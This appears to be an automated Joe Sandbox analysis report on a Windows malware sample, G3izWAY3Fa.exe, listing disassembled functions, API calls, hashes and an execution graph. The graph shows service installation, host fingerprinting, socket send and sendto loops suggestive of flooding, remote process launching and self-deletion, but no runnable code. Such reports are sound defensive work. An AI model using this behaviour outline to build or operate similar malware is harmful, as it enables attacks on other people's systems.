                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                                                                              • Instruction ID: f2d052a30a3472248e345e5832336eca953f0b1533712f6c56216133e551431f
                                                                                              • Opcode Fuzzy Hash: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                                                                              • Instruction Fuzzy Hash: 2AF0DA31D09320ABC661AF14FD4CADB7B75BB09B127014936F101B52E8D77868818BAD
                                                                                              APIs
                                                                                              • SetWindowTextA.USER32(00000000,00423680), ref: 00403887
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: TextWindow
                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 530164218-3283962145
                                                                                              • Opcode ID: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
                                                                                              • Instruction ID: 1abde7c3b4d11e9a2e55591403c44a3397e590d434b7b54f33d2a439c9831bdd
                                                                                              • Opcode Fuzzy Hash: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
                                                                                              • Instruction Fuzzy Hash: 0711C276B002119BC730AF55D8809377BADEF4471631981BFE80167390C73D9E028B98
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00404D01
                                                                                              • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404D6F
                                                                                                • Part of subcall function 00403DDB: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403DED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                                                                              • Instruction ID: 2250b5ae86c5db7695da18b81197a994f129f58ca555af08ca8730d1192fac1c
                                                                                              • Opcode Fuzzy Hash: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                                                                              • Instruction Fuzzy Hash: 5A118CB1600208BBDF217F629C4099B3B69EF84765F00813BFB14392A2C77C8951CFA9
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                              • WriteFile.KERNEL32(00000000,?,open C:\Windows\temp\Edit9,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWritelstrlen
                                                                                              • String ID: open C:\Windows\temp\Edit9
                                                                                              • API String ID: 427699356-1012079565
                                                                                              • Opcode ID: 88d3828efba7f0f9621c900284220c7fbe7b1f25f81f4ab1699cd667c1234228
                                                                                              • Instruction ID: 28baf68bc3b2ef7cd727d17ca875bc327529d04ff6cae4c8aacaeccaaba980a4
                                                                                              • Opcode Fuzzy Hash: 88d3828efba7f0f9621c900284220c7fbe7b1f25f81f4ab1699cd667c1234228
                                                                                              • Instruction Fuzzy Hash: 5AF0B4B2A04241FBDB40BBA09E49AAE37689B00348F10443BA206F51C2D6BC4982A76D
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,00000000,00403469,004032BC,00000000), ref: 004034AB
                                                                                              • GlobalFree.KERNEL32(?), ref: 004034B2
                                                                                              Strings
                                                                                              • "C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 004034A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$GlobalLibrary
                                                                                              • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"
                                                                                              • API String ID: 1100898210-3663855964
                                                                                              • Opcode ID: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                                                                              • Instruction ID: 7bfc0464e02b508f879d35a29cae48101a6ab00b4f5f00e512934bdeb57274a8
                                                                                              • Opcode Fuzzy Hash: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                                                                              • Instruction Fuzzy Hash: FBE08C3280653097C7221F05AE04B9AB66C6F94B22F068076E8407B3A1C3782C428AD8
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 0040551D
                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 0040552B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-2743851969
                                                                                              • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                              • Instruction ID: 1341b21386aa9ee456471dc2eb10899dbff8c866770b3e7d35d8712ddbbc4649
                                                                                              • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                              • Instruction Fuzzy Hash: D9D0C7B2509DB06EE7035614DC04B9F7B89DF17710F1944A2E540A61D5D27C5D418BFD
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405649
                                                                                              • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405657
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                              • Instruction ID: 25fbcb832c33ec4964fd827efed06e6d871dcd69bbe6b28132c6debe6a032c6a
                                                                                              • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                              • Instruction Fuzzy Hash: 02F0A736249D51DBC2025B355C04E6FAA94EF92354B54097AF444F2251D33A98129BBF

                                                                                              Execution Graph

                                                                                              Execution Coverage:7%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:14.8%
                                                                                              Total number of Nodes:609
                                                                                              Total number of Limit Nodes:2
                                                                                              execution_graph 1420 405182 WSAStartup 1421 4051a6 Sleep 1420->1421 1425 40507d time localtime wsprintfA 1421->1425 1423 4051b4 atoi 1423->1421 1424 4051cc Sleep CreateThread 1423->1424 1426 4050ca WSAStartup 1424->1426 1425->1423 1427 4050e3 CreateThread WaitForSingleObject CloseHandle closesocket Sleep 1426->1427 1427->1427 1436 405244 LoadLibraryA 6D0C6DE0 FindResourceA 1437 405284 LoadResource 1436->1437 1438 40532c 1436->1438 1437->1438 1440 40529f 1437->1440 1440->1438 1441 4052a8 LockResource 1440->1441 1441->1438 1442 4052b5 wsprintfA 1441->1442 1443 4052e6 1442->1443 1443->1438 1444 4052ed WriteFile SetFilePointer lstrlen WriteFile CloseHandle 1443->1444 1444->1438 1445 4027e4 1447 4027ed 1445->1447 1446 402967 realloc 1448 40281c 1446->1448 1447->1446 1447->1448 1356 406a48 __set_app_type __p__fmode __p__commode 1357 406ab7 1356->1357 1358 406acb 1357->1358 1359 406abf __setusermatherr 1357->1359 1368 406bb2 _controlfp 1358->1368 1359->1358 1361 406ad0 _initterm __getmainargs _initterm 1362 406b24 GetStartupInfoA 1361->1362 1364 406b58 GetModuleHandleA 1362->1364 1369 40597d WSAStartup 1364->1369 1368->1361 1380 4059f4 LoadLibraryA 6D0C6DE0 _mbscpy _mbscat RegOpenKeyExA 1369->1380 1372 4059a1 StartServiceCtrlDispatcherA 1374 4059c1 exit _XcptFilter 1372->1374 1373 4059c7 1382 405b10 28 API calls 1373->1382 1377 4059e7 1406 40355b LoadLibraryA 6D0C6DE0 GetModuleFileNameA GetShortPathNameA GetEnvironmentVariableA 1377->1406 1381 40599d 1380->1381 1381->1372 1381->1373 1383 405c64 1382->1383 1384 405d26 1382->1384 1418 406bd0 LoadLibraryA 6D0C6DE0 1383->1418 1385 405d29 OpenSCManagerA 1384->1385 1387 406033 1385->1387 1400 405d5b 1385->1400 1411 40604d 1387->1411 1388 405c6b 1389 406bd0 2 API calls 1388->1389 1392 405c79 1389->1392 1393 406bd0 2 API calls 1392->1393 1394 405c84 1393->1394 1395 406bd0 2 API calls 1394->1395 1396 405c8f 1395->1396 1397 406bd0 2 API calls 1396->1397 1398 405c9a 1397->1398 1399 406bd0 2 API calls 1398->1399 1401 405ca5 wsprintfA _mbscat _mbscat 1399->1401 1402 405e4b 1400->1402 1403 405e3e GetLastError 1400->1403 1404 405cf7 memset _mbscpy 1401->1404 1402->1387 1405 405e8c _mbscpy _mbscat RegOpenKeyA lstrlen 1402->1405 1403->1402 1404->1385 1405->1387 1407 403610 ShellExecuteEx 1406->1407 1409 4036bf ExitProcess 1407->1409 1410 40367f 6 API calls 1407->1410 1410->1409 1412 406061 1411->1412 1413 406055 CloseServiceHandle 1411->1413 1414 406089 1412->1414 1415 40607d RegCloseKey 1412->1415 1413->1412 1416 40355b 12 API calls 1414->1416 1415->1414 1417 4059db 1416->1417 1417->1374 1417->1377 1419 406bea 1418->1419 1419->1388 1449 4027a8 1450 4027b0 strlen malloc 1449->1450 1452 4027ed 1450->1452 1451 402967 realloc 1453 40281c 1451->1453 1452->1451 1452->1453 1454 4067e9 1458 406719 1454->1458 1455 40692b ??3@YAXPAX 1455->1458 1456 40680c 1457 406926 1456->1457 1462 4068f1 sprintf _mbscpy 1456->1462 1463 4068b1 sprintf _mbscpy 1456->1463 1458->1455 1458->1456 1459 406953 free 1458->1459 1460 406723 strcmp 1458->1460 1464 406974 1459->1464 1465 406969 GetTickCount 1459->1465 1460->1458 1461 406741 GetIfTable 1460->1461 1461->1458 1466 406787 ??2@YAPAXI 1461->1466 1462->1457 1463->1457 1465->1464 1466->1458 1467 4067b5 GetIfTable 1466->1467 1467->1455 1467->1458 1468 4048aa 9 API calls 1514 40484f htons 1468->1514 1471 404e6b 1475 404974 1565 4034e5 wsprintfA LoadLibraryA 1475->1565 1478 40497c memcpy send 1478->1471 1481 4049f0 1478->1481 1479 404a6b memset 1566 4037ea 1479->1566 1481->1471 1481->1479 1482 4037ea 3 API calls 1481->1482 1483 404e82 OpenMutexA 1481->1483 1484 404bf6 lstrcpyn 1481->1484 1485 404cc5 OpenMutexA 1481->1485 1488 404df2 GetTickCount wsprintfA 1481->1488 1491 404b75 lstrcpyn lstrlen lstrcpyn 1481->1491 1492 404c5b GetDesktopWindow ShellExecuteA 1481->1492 1496 404b07 lstrcpyn lstrlen lstrcpyn 1481->1496 1502 406bd0 LoadLibraryA 6D0C6DE0 1481->1502 1505 406bd0 2 API calls 1481->1505 1508 404f89 1481->1508 1482->1481 1486 404ea3 1483->1486 1487 404e95 ReleaseMutex CloseHandle 1483->1487 1584 403135 1484->1584 1485->1481 1493 404cd8 ReleaseMutex CloseHandle 1485->1493 1590 40351a OpenSCManagerA 1486->1590 1487->1486 1497 404e1f LoadLibraryA 6D0C6DE0 1488->1497 1578 403280 1491->1578 1492->1479 1493->1481 1572 403311 1496->1572 1500 404e48 WinExec 1497->1500 1499 404f7d 1501 40355b 12 API calls 1499->1501 1500->1479 1503 404f82 ExitProcess 1501->1503 1502->1481 1506 404d57 wsprintfA 1505->1506 1507 404d81 LoadLibraryA 6D0C6DE0 1506->1507 1507->1481 1509 40351a 5 API calls 1508->1509 1510 404f8f memset sprintf SHDeleteKeyA 1509->1510 1511 405063 1510->1511 1512 40355b 12 API calls 1511->1512 1513 405068 WinExec ExitProcess 1512->1513 1595 406c10 LoadLibraryA 6D0C6DE0 inet_addr 1514->1595 1517 4048a5 1517->1471 1519 403492 setsockopt 1517->1519 1518 404899 closesocket 1518->1517 1520 4034b2 WSAIoctl 1519->1520 1521 4034e3 memset 1519->1521 1520->1521 1522 406090 6 API calls 1521->1522 1523 406111 1522->1523 1524 40625c 1523->1524 1525 40623c _mbscpy 1523->1525 1526 40628b 1524->1526 1527 40626e _mbscpy 1524->1527 1525->1524 1528 4062bd 1526->1528 1529 40629d _mbscpy 1526->1529 1527->1526 1530 4062ef 1528->1530 1532 4062cf _mbscpy 1528->1532 1529->1528 1531 40634d 1530->1531 1534 40632d _mbscpy 1530->1534 1535 40630e _mbscpy 1530->1535 1533 4063ac 1531->1533 1537 40638c _mbscpy 1531->1537 1538 40636d _mbscpy 1531->1538 1532->1530 1536 40640e 1533->1536 1541 4063cc _mbscpy 1533->1541 1542 4063ee _mbscpy 1533->1542 1534->1531 1535->1531 1539 406440 sprintf _mbscpy lstrcpy 1536->1539 1540 406420 _mbscpy 1536->1540 1537->1533 1538->1533 1543 406506 1539->1543 1540->1539 1541->1536 1542->1536 1544 4065d6 _mbscpy 1543->1544 1545 40650e RegQueryValueExA 1543->1545 1546 406655 GlobalMemoryStatusEx 1544->1546 1547 406558 GetSystemInfo memset sprintf _mbscpy 1545->1547 1548 406686 __aulldiv 1546->1548 1547->1546 1549 406694 wsprintfA malloc GetAdaptersInfo 1548->1549 1550 406704 GetAdaptersInfo 1549->1550 1551 4066e7 free malloc 1549->1551 1552 406953 free 1550->1552 1553 406719 1550->1553 1551->1550 1555 406974 1552->1555 1556 406969 GetTickCount 1552->1556 1553->1552 1554 406723 strcmp 1553->1554 1560 40692b ??3@YAXPAX 1553->1560 1562 40680c 1553->1562 1554->1553 1557 406741 GetIfTable 1554->1557 1555->1475 1556->1555 1557->1553 1558 406787 ??2@YAPAXI 1557->1558 1558->1553 1559 4067b5 GetIfTable 1558->1559 1559->1553 1559->1560 1560->1553 1561 406926 1561->1475 1562->1561 1563 4068f1 sprintf _mbscpy 1562->1563 1564 4068b1 sprintf _mbscpy 1562->1564 1563->1561 1564->1561 1565->1478 1567 403803 select 1566->1567 1568 4037fe 1566->1568 1567->1568 1571 403835 1567->1571 1568->1481 1569 403839 __WSAFDIsSet 1569->1567 1570 40384c recv 1569->1570 1570->1568 1570->1571 1571->1567 1571->1568 1571->1569 1573 403369 1572->1573 1576 403327 1572->1576 1573->1481 1574 403358 1598 4030fd CreateThread 1574->1598 1576->1574 1597 4030fd CreateThread 1576->1597 1579 403299 1578->1579 1580 40330d 1578->1580 1581 4032fc 1579->1581 1583 4030fd CreateThread 1579->1583 1580->1481 1599 4030fd CreateThread 1581->1599 1583->1579 1585 40327c 1584->1585 1587 403150 1584->1587 1585->1481 1586 40326c 1601 4030fd CreateThread 1586->1601 1587->1586 1600 4030fd CreateThread 1587->1600 1591 40355a memset sprintf SHDeleteKeyA 1590->1591 1592 40352d OpenServiceA 1590->1592 1591->1499 1593 403555 CloseServiceHandle 1592->1593 1594 40354b DeleteService CloseServiceHandle 1592->1594 1593->1591 1594->1593 1596 404875 socket connect 1595->1596 1596->1517 1596->1518 1597->1576 1598->1573 1599->1580 1600->1587 1601->1585 1602 40588b LoadLibraryA 6D0C6DE0 1603 4058bd 1602->1603 1604 4058b3 1602->1604 1608 4058dd Sleep 1603->1608 1611 4058f5 1603->1611 1605 4058ba 1604->1605 1606 40593f Sleep 1604->1606 1605->1603 1607 405904 Sleep 1605->1607 1606->1611 1607->1611 1608->1611 1612 407470 6 API calls 1714 407440 1612->1714 1614 40756d socket 1682 407512 1614->1682 1615 406c10 3 API calls 1615->1682 1616 4078e2 RtlExitUserThread LoadLibraryA 6D0C6DE0 1617 407a2b 1616->1617 1618 40796f 1616->1618 1620 406bd0 2 API calls 1617->1620 1719 406c50 6 API calls 1618->1719 1622 407a31 1620->1622 1623 407a38 wsprintfA 1622->1623 1627 406bd0 2 API calls 1622->1627 1634 407a8a 1623->1634 1624 4079df 1628 407a23 RtlExitUserThread 1624->1628 1631 407a1d Sleep 1624->1631 1632 407a0d Sleep TerminateProcess 1624->1632 1626 40761b inet_addr 1626->1682 1627->1623 1628->1617 1629 407ae2 RtlExitUserThread LoadLibraryA 6D0C6DE0 1633 406c50 6 API calls 1629->1633 1630 406c10 3 API calls 1630->1634 1631->1624 1632->1631 1635 407b68 wsprintfA 1633->1635 1634->1629 1634->1630 1721 408680 socket 1634->1721 1636 407bf7 1635->1636 1642 407bc9 1635->1642 1639 407c21 Sleep TerminateProcess 1636->1639 1640 407c39 1636->1640 1638 407aad send 1643 407ad7 Sleep 1638->1643 1639->1640 1645 406bd0 2 API calls 1640->1645 1641 407d78 RtlExitUserThread LoadLibraryA 6D0C6DE0 LoadLibraryA 6D0C6DE0 1644 406c10 3 API calls 1641->1644 1642->1641 1646 406c10 3 API calls 1642->1646 1650 408680 4 API calls 1642->1650 1643->1634 1680 407e08 1644->1680 1647 407c3f 1645->1647 1646->1642 1648 407c9b 1647->1648 1649 407c4d 1647->1649 1653 407ca2 1648->1653 1654 407cdd 1648->1654 1651 407c52 wsprintfA 1649->1651 1652 407c76 wsprintfA 1649->1652 1655 407d48 send 1650->1655 1651->1642 1652->1642 1658 406bd0 2 API calls 1653->1658 1656 406bd0 2 API calls 1654->1656 1661 407d6e Sleep 1655->1661 1659 407ce2 1656->1659 1657 407e24 socket 1657->1680 1660 407ca7 1658->1660 1662 406bd0 2 API calls 1659->1662 1663 406bd0 2 API calls 1660->1663 1661->1642 1665 407cf0 wsprintfA 1662->1665 1664 407cb5 wsprintfA 1663->1664 1664->1642 1665->1642 1666 407ecb RtlExitUserThread LoadLibraryA 6D0C6DE0 1667 407f3e 1666->1667 1668 407f7f 1666->1668 1669 406bd0 2 API calls 1667->1669 1670 406bd0 2 API calls 1668->1670 1671 407f4a 1669->1671 1672 407f8c 1670->1672 1674 406bd0 2 API calls 1671->1674 1675 406bd0 2 API calls 1672->1675 1673 406bd0 LoadLibraryA 6D0C6DE0 1673->1680 1676 407f58 wsprintfA 1674->1676 1677 407f9a wsprintfA 1675->1677 1688 407fbf 1676->1688 1677->1688 1678 407e92 sendto 1679 407eb5 Sleep 1678->1679 1678->1680 1679->1680 1680->1657 1680->1666 1680->1673 1680->1678 1681 40801d RtlExitUserThread LoadLibraryA 6D0C6DE0 1683 40808e 1681->1683 1682->1614 1682->1615 1682->1616 1682->1626 1685 407882 sendto 1682->1685 1686 408124 RtlExitUserThread 1683->1686 1687 40809b wsprintfA wsprintfA 1683->1687 1684 406c10 3 API calls 1684->1688 1685->1682 1691 408130 1686->1691 1690 406c10 3 API calls 1687->1690 1688->1681 1688->1684 1689 408680 4 API calls 1688->1689 1692 407fef send 1689->1692 1693 4080e6 1690->1693 1694 40815a 14 API calls 1691->1694 1696 408017 Sleep 1692->1696 1695 408680 4 API calls 1693->1695 1700 408235 1694->1700 1697 4080ef send 1695->1697 1696->1688 1698 408117 Sleep 1697->1698 1698->1683 1699 408261 1700->1699 1701 4082f9 1700->1701 1702 4085da 1700->1702 1703 406c10 3 API calls 1701->1703 1726 4085fe 1702->1726 1705 408355 inet_ntoa inet_addr 1703->1705 1708 4083ab 1705->1708 1706 4085e6 1709 4083c6 htonl 1708->1709 1711 4083f9 1709->1711 1710 408441 RtlExitUserThread 1710->1711 1711->1710 1712 4084ad sprintf inet_ntoa inet_addr htonl 1711->1712 1713 40858f sendto 1711->1713 1712->1711 1713->1711 1715 407448 1714->1715 1716 40744b 1714->1716 1715->1682 1729 407350 lstrlen ??2@YAPAXI 1716->1729 1718 40746a 1718->1682 1720 406ca5 wsprintfA 1719->1720 1720->1624 1722 408697 1721->1722 1723 40869e htons connect 1721->1723 1722->1638 1724 4086d0 closesocket 1723->1724 1725 4086df 1723->1725 1724->1638 1725->1638 1727 408603 1726->1727 1728 40860a WSACleanup 1726->1728 1727->1728 1728->1706 1730 4073be 1729->1730 1730->1718 1731 4086f0 LoadLibraryA 6D0C6DE0 LoadLibraryA 6D0C6DE0 1732 40879a 1731->1732 1733 4087a3 1732->1733 1734 406c10 3 API calls 1732->1734 1735 4087d5 1734->1735 1736 406bd0 2 API calls 1735->1736 1737 408806 inet_addr 1736->1737 1738 406c10 3 API calls 1737->1738 1739 408835 1738->1739 1740 406bd0 2 API calls 1739->1740 1741 408845 1740->1741 1742 406bd0 2 API calls 1741->1742 1743 40886a htonl 1742->1743 1748 40888e 1743->1748 1744 408abe RtlExitUserThread LoadLibraryA 6D0C6DE0 LoadLibraryA 6D0C6DE0 1745 406c10 3 API calls 1744->1745 1781 408b59 1745->1781 1746 406bd0 LoadLibraryA 6D0C6DE0 1746->1748 1747 408b89 1748->1744 1748->1746 1749 406bd0 2 API calls 1748->1749 1773 408a5c sendto 1748->1773 1750 40898b wsprintfA 1749->1750 1752 